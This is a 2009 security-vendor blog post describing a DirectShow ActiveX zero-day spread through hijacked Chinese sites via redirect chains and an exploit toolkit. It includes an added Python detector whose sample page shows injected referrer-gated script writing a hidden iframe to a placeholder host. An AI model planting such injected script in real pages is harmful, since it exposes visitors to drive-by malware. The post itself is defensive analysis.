New Attacks Against Internet Explorer
Monday July 6, 2009 at 2:39 am CST
Posted by Haowei Ren, Geok Meng Ong
If you read Geok Meng and Xiaobo’s blog published in December last year, this must seem almost like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.
At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.
When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.
During research, one of the things we found interesting was that the web exploit toolkit explicitly checks that the origin of the hyperlinked reference does not come from the “.gov.cn” and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the reference is not coming from either of these domains, it starts sending a cocktail of exploits including:
- Exploit-MSDirectShow.b (zero-day)
- Exploit-XMLhttp.d
- Exploit-RealPlay.a
- JS/Exploit-BBar
- Exploit-MS06-014
Each of these exploits targets a different application that could be vulnerable (Internet Explorer 6 and 7, the DirectShow ActiveX control, RealPlayer, the Baidu Toolbar), all of which can be reached through the Internet Explorer browser.
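As an added illustration (this script is not part of the original post or any McAfee tooling), the two behaviours described above, a referrer check against domain strings and an off-site redirect injected into an otherwise legitimate page, can be picked out of a captured copy of a page's source. The sample HTML and the hostnames in it are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an injected page (not a real capture): the inline script
# gates on document.referrer, excluding the two suffixes named in the post, and
# only then writes a hidden iframe that pulls in the next hop of the chain.
SAMPLE_HTML = """<html><body><p>Welcome to our school site</p>
<script>
var r = document.referrer;
if (r.indexOf('.gov.cn') == -1 && r.indexOf('.edu.cn') == -1) {
  document.write('<iframe src="http://hop2.example.invalid/go.php" width=0 height=0></iframe>');
}
</script>
<script src="http://static.example.invalid/analytics.js"></script>
</body></html>"""

# Inline <script> bodies, including those that span several lines.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
# src= attributes of iframe/script tags, also when the tag is built inside JS text.
SRC_RE = re.compile(r"""<(?:iframe|script)[^>]+src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Quoted strings that are just a (possibly leading-dot) domain suffix, e.g. '.gov.cn'.
GATE_RE = re.compile(r"""['"](\.?[a-z0-9-]+(?:\.[a-z0-9-]+)+)['"]""", re.I)


def find_referrer_gating(html):
    """Return the domain strings that inline scripts compare document.referrer
    against; an allow/deny list like this is the gating behaviour the post describes."""
    gated = []
    for body in SCRIPT_RE.findall(html):
        if "document.referrer" in body:
            gated.extend(GATE_RE.findall(body))
    return gated


def find_offsite_loads(html, site_host):
    """Return iframe/script src URLs whose host is neither the hosting site nor
    one of its subdomains (the injected links pointing at hijacked site #2)."""
    hits = []
    for url in SRC_RE.findall(html):
        host = urlparse(url).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            hits.append(url)
    return hits


def is_suspicious(html, site_host):
    """A page that both gates on the referrer and loads off-site content deserves review."""
    return bool(find_referrer_gating(html)) and bool(find_offsite_loads(html, site_host))
```

Running it against a full site crawl rather than one page is a matter of feeding each fetched document through is_suspicious and reviewing the hits by hand.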

From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.
When successful, the attacker installs a downloader Trojan that could download other malware.
This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, in IE 7 on Windows Vista, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.
The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).
We will post more information as we receive it.
(Thanks to our colleague Wei Wang for assistance in this analysis.)
